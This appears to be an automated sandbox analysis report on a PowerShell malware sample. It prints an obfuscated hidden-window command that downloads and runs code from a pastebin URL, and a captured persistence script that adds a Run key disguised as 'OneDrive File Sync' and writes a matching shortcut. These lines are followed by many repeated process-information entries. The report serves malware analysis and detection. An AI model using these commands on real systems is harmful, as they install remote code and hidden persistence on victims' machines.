Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00F42AC pushad ; retf 0_2_00007FF7C00F42AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00FA2E0 push 4DA1CBE8h; retf 0_2_00007FF7C00FA2F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00F8426 pushad ; ret 0_2_00007FF7C00F845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00F845E push eax; ret 0_2_00007FF7C00F846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00F5D72 push es; iretd 0_2_00007FF7C00F5D77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00F7866 pushad ; retf 0_2_00007FF7C00F789D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00F789E push eax; retf 0_2_00007FF7C00F78AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C010782E pushad ; iretd 7_2_00007FF7C010785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C010785E push eax; iretd 7_2_00007FF7C010786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C01C7AEB push ebp; iretd 7_2_00007FF7C01C7AEC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C01C6DC3 push edi; iretd 7_2_00007FF7C01C6DC6

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
